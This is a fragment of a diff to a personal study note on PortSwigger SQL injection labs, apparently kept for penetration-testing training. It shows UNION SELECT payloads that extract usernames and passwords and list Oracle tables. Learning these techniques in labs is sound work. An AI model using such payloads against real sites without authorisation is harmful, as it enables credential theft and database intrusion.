TheWhiteFluid/Obsidian_Cyber/Obisdian_vault/TryHackMe/Jr. Penetration Tester/PortSwigger.Web-Security.Labs/SQL Injection.md

 ' UNION SELECT username_abcdef, password_abcdef FROM users_abcdef--
 ```

-## 6.SQL injection attack, listing the database contents on Oracle
+## 6. SQL injection attack, listing the database contents on Oracle

 ```
 ' UNION SELECT 'a', 'b' FROM all_tables--